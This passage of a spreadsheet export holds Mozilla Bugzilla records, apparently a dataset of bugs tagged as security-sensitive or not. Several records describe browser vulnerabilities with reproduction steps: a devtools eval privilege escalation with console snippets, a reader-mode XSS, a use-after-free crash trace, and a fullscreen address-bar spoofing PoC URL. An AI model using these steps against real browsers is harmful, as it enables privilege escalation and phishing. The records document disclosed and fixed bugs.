    #22 0x7fff8d002650 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x180052650)
0x1254e68ea0b0 is located 560 bytes inside of 584-byte region [0x1254e68e9e80,0x1254e68ea0c8)
freed by thread T5 here:
    #0 0x7fff58067cdb in free Z:\task_163722766350223\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:82
    #1 0x7fff352ff30c in mozilla::gfx::VRProcessParent::~VRProcessParent /builds/worker/checkouts/gecko/gfx/vr/ipc/VRProcessParent.cpp:45
    #2 0x7fff33891303 in mozilla::MozPromise&lt;void *,mozilla::ipc::LaunchError,0&gt;::ThenValue&lt;`lambda at /builds/worker/checkouts/gecko/ipc/glue/GeckoChildProcessHost.cpp:487:19'&gt;::DoResolveOrRejectInternal /builds/worker/workspace/obj-build/dist/include/mozilla/MozPromise.h:914
    #3 0x7fff3190552e in mozilla::MozPromise&lt;bool,nsresult,1&gt;::ThenValueBase::ResolveOrRejectRunnable::Run /builds/worker/workspace/obj-build/dist/include/mozilla/MozPromise.h:487
    #4 0x7fff337e2ab4 in MessageLoop::DeferOrRunPendingTask /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:463
    #5 0x7fff337e4120 in MessageLoop::DoWork /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:538
    #6 0x7fff337b537b in base::MessagePumpForIO::DoRunLoop /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_pump_win.cc:419
    #7 0x7fff337b6198 in base::MessagePumpWin::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_pump_win.h:79
    #8 0x7fff337e12d5 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #9 0x7fff337f1f9e in base::Thread::ThreadMain /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:187
    #10 0x7fff337b77d6 in `anonymous namespace'::ThreadFunc /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_win.cc:19
    #11 0x7fff58072273 in __asan::AsanThread::ThreadStart Z:\task_163722766350223\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_thread.cpp:278
    #12 0x7fff8bc37033 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017033)
    #13 0x7fff66783817 in patched_BaseThreadInitThunk /builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp:570
    #14 0x7fff8d002650 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x180052650)
previously allocated by thread T0 here:
    #0 0x7fff58067deb in malloc Z:\task_163722766350223\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cpp:98
    #1 0x7fff6667134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7fff352fc9a0 in mozilla::gfx::VRProcessManager::LaunchVRProcess /builds/worker/checkouts/gecko/gfx/vr/ipc/VRProcessManager.cpp:67
    #3 0x7fff3529d926 in mozilla::gfx::GPUChild::RecvCreateVRProcess /builds/worker/checkouts/gecko/gfx/ipc/GPUChild.cpp:147
    #4 0x7fff33c694f7 in mozilla::gfx::PGPUChild::OnMessageReceived /builds/worker/workspace/obj-build/ipc/ipdl/PGPUChild.cpp:1253
    #5 0x7fff338becf4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2043
    #6 0x7fff338bb160 in mozilla::ipc::MessageChannel::DispatchMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1968
    #7 0x7fff338bcf37 in mozilla::ipc::MessageChannel::RunMessage /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1827
    #8 0x7fff338bd4e8 in mozilla::ipc::MessageChannel::MessageTask::Run /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1855
    #9 0x7fff324c3c5e in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:468
    #10 0x7fff3247dc88 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:771
    #11 0x7fff3247a62c in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:607
    #12 0x7fff3247aff4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:391
    #13 0x7fff324ca6a1 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #14 0x7fff324a66d4 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1195
    #15 0x7fff324b6b3c in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #16 0x7fff338c823d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #17 0x7fff337e12d5 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
Thread T5 created by T0 here:
    #0 0x7fff580731d2 in __asan_wrap_CreateThread Z:\task_163722766350223\fetches\llvm-project\llvm\projects\compiler-rt\lib\asan\asan_win.cpp:146
    #1 0x7fff337b776c in PlatformThread::Create /builds/worker/checkouts/gecko/ipc/chromium/src/base/platform_thread_win.cc:57
    #2 0x7fff337f15bc in base::Thread::StartWithOptions /builds/worker/checkouts/gecko/ipc/chromium/src/base/thread.cc:93
    #3 0x7fff3253aa6a in NS_InitXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:318
    #4 0x7fff3f650270 in ScopedXPCOMStartup::Initialize /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:1731
    #5 0x7fff3f67516f in XREMain::XRE_main /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5498
    #6 0x7fff3f67640a in XRE_main /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5561
    #7 0x7ff7523e2588 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:395
    #8 0x7ff7523e17ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #9 0x7ff7524dca27 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #10 0x7fff8bc37033 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017033)
    #11 0x7fff8d002650 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x180052650)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/gfx/vr/ipc/VRProcessParent.cpp:165 in mozilla::gfx::VRProcessParent::InitAfterConnect
Shadow bytes around the buggy address:
  0x04738311d3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x04738311d3d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x04738311d3e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x04738311d3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x04738311d400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x04738311d410: fd fd fd fd fd fd[fd]fd fd fa fa fa fa fa fa fa
  0x04738311d420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x04738311d430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x04738311d440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x04738311d450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x04738311d460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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21636==ABORTING
```
This vuln is discovered by bo13oy of Cyber Kunlun Lab.
Thanks.</t>
        </is>
      </c>
      <c r="X1286" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1287">
      <c r="A1287" t="n">
        <v>1865689</v>
      </c>
      <c r="B1287" t="inlineStr">
        <is>
          <t>2023-11-20 09:58:26 -0800</t>
        </is>
      </c>
      <c r="C1287" t="inlineStr">
        <is>
          <t>Privilege escalation through devtools.inspectedWindow.eval</t>
        </is>
      </c>
      <c r="D1287" t="inlineStr">
        <is>
          <t>2024-05-16 14:51:25 -0700</t>
        </is>
      </c>
      <c r="E1287" t="n">
        <v>1</v>
      </c>
      <c r="F1287" t="n">
        <v>1</v>
      </c>
      <c r="G1287" t="n">
        <v>3</v>
      </c>
      <c r="H1287" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1287" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1287" t="inlineStr">
        <is>
          <t>Developer Tools</t>
        </is>
      </c>
      <c r="K1287" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1287" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1287" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1287" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1287" t="inlineStr">
        <is>
          <t>[adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q1287" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1287" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1287" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T1287" t="n">
        <v>1</v>
      </c>
      <c r="U1287" t="n">
        <v>0</v>
      </c>
      <c r="V1287" t="n">
        <v>26</v>
      </c>
      <c r="W1287" t="inlineStr">
        <is>
          <t>Created attachment 9364546
devtools-eval.zip
`devtools.inspectedWindow.eval` has denylist-based access checks ([source](https://searchfox.org/mozilla-central/rev/42acdc9cd5ae89222bdceeeaed7bacac755be48f/devtools/server/actors/addon/webextension-inspected-window.js#537-540,552,554)), which are incomplete. `view-source:`-URLs can be used to bypass access scheme-based restrictions, including `moz-extension:`-URLs and restricted domains such as AMO.
The attached test case demonstrates the vulnerable primitive; at the end of this report I have also included a description to escalate privileges through this primitive.
STR:
1. Load the attached extension (`devtools-eval.zip`) at `about:debugging` or through web-ext. It adds a panel "DevTools eval" to the devtools. This devtools panel executes code in the inspected page and prints the results.
2. Navigate to https://example.com/ and click on the panel's button.
3. Navigate to about:debugging, click on "This Nightly" and inspect a moz-extension:-URL of another extension. Then click on the panel's button.
4. View the source of the page at tab 3.
Expected:
- step 2 execution succeeds (included in the STR to show how successful execution looks like).
- step 3 execution error (other moz-extension: may be more privileged).
- step 4 execution error (other extension may be more privileged)
Actual:
- step 2 as expected.
- step 3 as expected (this was fixed in bug 1425197).
- step 4 unexpectedly succeeds, demonstrating that `devtools.inspectedWindow.eval` is able to run scripts in the context of other extensions in some cases.
Notes:
- The `view-source:`-document has the same (storage) principal as the extension. This allows reading of other extension's content.
- At the surface, it seems that extension APIs are not injected in this context.
- But extension APIs can be accessed indirectly, as follows:
   1. Install an extension that has web_accessible_resources (e.g. uBlock Origin). An alternative is to visit `about:config`, set `devtools.aboutdebugging.showHiddenAddons` to true and inspect the WebCompat add-on's manifest.json from about:debugging (after a reload).
   2. Through the devtools, open a popup to get a handle to an extension page that has access to extension APIs:
    - uBlock Origin: `w = window.open(origin + "/web_accessible_resources/README.txt")`
    - WebCompat: `w = window.open(origin + "/shims/mochitest-shim-1.js");`
   3. Verify that privileged extension APIs are available (e.g. tabs API):
    - `w.browser.tabs.getCurrent({})`
- The above extra notes show the extra impact on extension URLs. The same also applies to restricted domains such as AMO.
- Access checks are deny-list-based, at https://searchfox.org/mozilla-central/rev/42acdc9cd5ae89222bdceeeaed7bacac755be48f/devtools/server/actors/addon/webextension-inspected-window.js#537-540,552,554 . An allowlist would probably make more sense here.
- The other-extension bypass happens because the scheme is `view-source:`, which is also part of `nodePrincipal`, and therefore [`window.document.nodePrincipal.addonId`](https://searchfox.org/mozilla-central/rev/42acdc9cd5ae89222bdceeeaed7bacac755be48f/devtools/server/actors/addon/webextension-inspected-window.js#552) is `""`.</t>
        </is>
      </c>
      <c r="X1287" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1288">
      <c r="A1288" t="n">
        <v>1224100</v>
      </c>
      <c r="B1288" t="inlineStr">
        <is>
          <t>2015-11-11 20:50:03 -0800</t>
        </is>
      </c>
      <c r="C1288" t="inlineStr">
        <is>
          <t>"Conditional jump or move depends on uninitialised value(s)" at imgFrame::Optimize</t>
        </is>
      </c>
      <c r="D1288" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:45 -0700</t>
        </is>
      </c>
      <c r="E1288" t="n">
        <v>1</v>
      </c>
      <c r="F1288" t="n">
        <v>1</v>
      </c>
      <c r="G1288" t="n">
        <v>3</v>
      </c>
      <c r="H1288" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1288" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1288" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1288" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1288" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1288" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1288" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1288" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1288" t="inlineStr">
        <is>
          <t>[asan][post-critsmash-triage][adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q1288" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1288" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1288" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1288" t="n">
        <v>1</v>
      </c>
      <c r="U1288" t="n">
        <v>0</v>
      </c>
      <c r="V1288" t="n">
        <v>30</v>
      </c>
      <c r="W1288" t="inlineStr">
        <is>
          <t>1. http://www.ref4bux.com/index.php?view=ads
2. Spin the wheel to determine your Crash signature.
bp-29c4ae76-8643-4453-a758-3b4da2151112
[@ js::jit::EnterBaselineMethod ]
exploitability low
bp-3e41d6cd-49e4-4ab2-86ef-1357c2151112
[@ nsDisplayList::SortByZOrder ]
bp-001dcdfd-2e77-454e-af93-96fb92151112
[@ AddRule ]
Bughunter shows crashes across the board on all branches/platforms for opt and debug with a variety of stacks/signatures including some rated low on Windows -&gt; S-S
Asan reports 
==18315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000d308f0 at pc 0x7f8c08342d5e bp 0x7f8bf0954e20 sp 0x7f8bf0954e18
==18315==AddressSanitizer: while reporting a bug found another one.Ignoring.</t>
        </is>
      </c>
      <c r="X1288" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" t="n">
        <v>1136692</v>
      </c>
      <c r="B1289" t="inlineStr">
        <is>
          <t>2015-02-25 05:56:53 -0800</t>
        </is>
      </c>
      <c r="C1289" t="inlineStr">
        <is>
          <t>Reader Mode does not completely disable all active content (XSS)</t>
        </is>
      </c>
      <c r="D1289" t="inlineStr">
        <is>
          <t>2016-11-02 17:51:08 -0700</t>
        </is>
      </c>
      <c r="E1289" t="n">
        <v>1</v>
      </c>
      <c r="F1289" t="n">
        <v>1</v>
      </c>
      <c r="G1289" t="n">
        <v>3</v>
      </c>
      <c r="H1289" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1289" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1289" t="inlineStr">
        <is>
          <t>Reader Mode</t>
        </is>
      </c>
      <c r="K1289" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1289" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1289" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1289" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1289" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P1289" t="inlineStr"/>
      <c r="Q1289" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1289" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1289" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1289" t="n">
        <v>1</v>
      </c>
      <c r="U1289" t="n">
        <v>0</v>
      </c>
      <c r="V1289" t="n">
        <v>5</v>
      </c>
      <c r="W1289" t="inlineStr">
        <is>
          <t>Created attachment 8569150
PoC
STR
1) Open attachment
2) click on reader mode button
3) click on the black rectangle
4) XSS
I think this *may* be a bug in ParserUtils or in how they are used, but I did not have the time to look into this properly. Will update if I make any additional findings.</t>
        </is>
      </c>
      <c r="X1289" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" t="n">
        <v>728256</v>
      </c>
      <c r="B1290" t="inlineStr">
        <is>
          <t>2012-02-17 08:55:11 -0800</t>
        </is>
      </c>
      <c r="C1290" t="inlineStr">
        <is>
          <t>MWC demo: WebGL Cube and Gnome</t>
        </is>
      </c>
      <c r="D1290" t="inlineStr">
        <is>
          <t>2012-02-21 03:02:06 -0800</t>
        </is>
      </c>
      <c r="E1290" t="n">
        <v>1</v>
      </c>
      <c r="F1290" t="n">
        <v>1</v>
      </c>
      <c r="G1290" t="n">
        <v>5</v>
      </c>
      <c r="H1290" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1290" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J1290" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1290" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1290" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1290" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1290" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1290" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1290" t="inlineStr"/>
      <c r="Q1290" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1290" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1290" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1290" t="n">
        <v>1</v>
      </c>
      <c r="U1290" t="n">
        <v>0</v>
      </c>
      <c r="V1290" t="n">
        <v>6</v>
      </c>
      <c r="W1290" t="inlineStr">
        <is>
          <t>Demos showcasing WebGL on phones and tablets</t>
        </is>
      </c>
      <c r="X1290" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" t="n">
        <v>190396</v>
      </c>
      <c r="B1291" t="inlineStr">
        <is>
          <t>2003-01-23 17:30:46 -0800</t>
        </is>
      </c>
      <c r="C1291" t="inlineStr">
        <is>
          <t>NSS fails to use CRL's if you have an nCipher token installed</t>
        </is>
      </c>
      <c r="D1291" t="inlineStr">
        <is>
          <t>2003-02-03 11:06:15 -0800</t>
        </is>
      </c>
      <c r="E1291" t="n">
        <v>1</v>
      </c>
      <c r="F1291" t="n">
        <v>1</v>
      </c>
      <c r="G1291" t="n">
        <v>3</v>
      </c>
      <c r="H1291" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1291" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1291" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1291" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1291" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1291" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1291" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1291" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1291" t="inlineStr"/>
      <c r="Q1291" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1291" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1291" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="T1291" t="n">
        <v>1</v>
      </c>
      <c r="U1291" t="n">
        <v>0</v>
      </c>
      <c r="V1291" t="n">
        <v>10</v>
      </c>
      <c r="W1291" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3a) Gecko/20021213
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3a) Gecko/20021213
If you have an nCipher hardware token installed and configured, NSS fails to
check CRL's installed in the system. The effect is that even though you have
loaded a CRL into your system, a certificate on the revocation list verifies as
valid.
nssTrustDomain_FindCRLsBySubject() traverses through the slots to find
all the CRL's which are available.
Once it reaches the ncipher slot, it queries the nCipher device for a CRL.
nCipher doesn't understand this type of object, so returns a
CKR_ATTRIBUTE_VALUE_INVALID (0x13) error. This gets propogated back up to
nssTrustDomain_FindCRLsBySubject()  as a failure.
Bob suggested the solution would be to treat handle this error as simply
returning an empty set of objects.
We tested Bob's proposed change and it works in our environment, with very
limited testing.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X1291" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" t="n">
        <v>19119</v>
      </c>
      <c r="B1292" t="inlineStr">
        <is>
          <t>1999-11-17 15:01:31 -0800</t>
        </is>
      </c>
      <c r="C1292" t="inlineStr">
        <is>
          <t>No Cartman on mac yet...</t>
        </is>
      </c>
      <c r="D1292" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E1292" t="n">
        <v>1</v>
      </c>
      <c r="F1292" t="n">
        <v>1</v>
      </c>
      <c r="G1292" t="n">
        <v>6</v>
      </c>
      <c r="H1292" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1292" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1292" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K1292" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L1292" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1292" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N1292" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1292" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1292" t="inlineStr">
        <is>
          <t>[dogfood+][nsbeta2-] Code Checked In</t>
        </is>
      </c>
      <c r="Q1292" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1292" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1292" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1292" t="n">
        <v>1</v>
      </c>
      <c r="U1292" t="n">
        <v>0</v>
      </c>
      <c r="V1292" t="n">
        <v>68</v>
      </c>
      <c r="W1292" t="inlineStr">
        <is>
          <t>need a status update on how this is coming..
definitely pdt+ material.</t>
        </is>
      </c>
      <c r="X1292" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" t="n">
        <v>1149526</v>
      </c>
      <c r="B1293" t="inlineStr">
        <is>
          <t>2015-03-31 07:07:43 -0700</t>
        </is>
      </c>
      <c r="C1293" t="inlineStr">
        <is>
          <t>Check HeapPtrs have GC lifetime</t>
        </is>
      </c>
      <c r="D1293" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:05 -0700</t>
        </is>
      </c>
      <c r="E1293" t="n">
        <v>1</v>
      </c>
      <c r="F1293" t="n">
        <v>1</v>
      </c>
      <c r="G1293" t="n">
        <v>3</v>
      </c>
      <c r="H1293" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1293" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1293" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1293" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1293" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1293" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1293" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1293" t="inlineStr">
        <is>
          <t>[adv-main38+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q1293" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1293" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1293" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1293" t="n">
        <v>1</v>
      </c>
      <c r="U1293" t="n">
        <v>0</v>
      </c>
      <c r="V1293" t="n">
        <v>39</v>
      </c>
      <c r="W1293" t="inlineStr">
        <is>
          <t>The HeapPtr wrapper template is designed to be used only in object which have GC lifetime, i.e. they are only ever part of a GC thing and are destroyed when we sweep that thing.
I added some assertions to test this and found there are a few cases where HeapPtrs are deleted outside of GC sweeping.  This is potentially bad since for a HeapPtr&lt;JSObject*&gt; we could try and mark a store buffer entry that points at it after it has been destroyed.
I don't think we've seen any crashes like this so it's possible that the JSObject ones are only used with tenured objects, but I'm marking this security sensitive just in case.</t>
        </is>
      </c>
      <c r="X1293" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" t="n">
        <v>1306696</v>
      </c>
      <c r="B1294" t="inlineStr">
        <is>
          <t>2016-09-30 12:06:43 -0700</t>
        </is>
      </c>
      <c r="C1294" t="inlineStr">
        <is>
          <t>Location bar spoofing Entering Fullscreen and lock exit fullscreen mode</t>
        </is>
      </c>
      <c r="D1294" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:06 -0700</t>
        </is>
      </c>
      <c r="E1294" t="n">
        <v>1</v>
      </c>
      <c r="F1294" t="n">
        <v>1</v>
      </c>
      <c r="G1294" t="n">
        <v>3</v>
      </c>
      <c r="H1294" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1294" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1294" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1294" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L1294" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1294" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1294" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1294" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+] Important for Fennec</t>
        </is>
      </c>
      <c r="Q1294" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1294" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1294" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T1294" t="n">
        <v>1</v>
      </c>
      <c r="U1294" t="n">
        <v>0</v>
      </c>
      <c r="V1294" t="n">
        <v>46</v>
      </c>
      <c r="W1294" t="inlineStr">
        <is>
          <t>Created attachment 8796660
4.png
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Steps to reproduce:
User Agent: Mozilla 49
OS/ Android 4.4 kitkat
Steps to reproduce:
When you enable full screen mode, the user has the browser address bar disappears when the user goes to another site the option to return to the normal display mode does not work to exit full-screen mode, the user is forced to restart the browser.
Actual results:
Steps
1.Go to the testcase uploaded http://unix.testvt.testforhost.com/poc1.html
2. Touch the web page "click here" ( the fullscreen mode is activated )
3 Try to go out of the fullscreen mode by pressing the back button on your Android device
4 Try to go up in the web page for try to view the location bar
Actual results:
Each time that you touch the web page , the fullscreen mode is activated and leads to an URL and SSL spoofing vulnerability with a fake location bar.
An attacker could also depict you the address bar  the browser.
Expected results:
Expected results:
The fullscreen mode should be activated with the possibility to forbid this action on the webpage concerned.
----------
Sorry but I have a bad English</t>
        </is>
      </c>
      <c r="X1294" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1295">
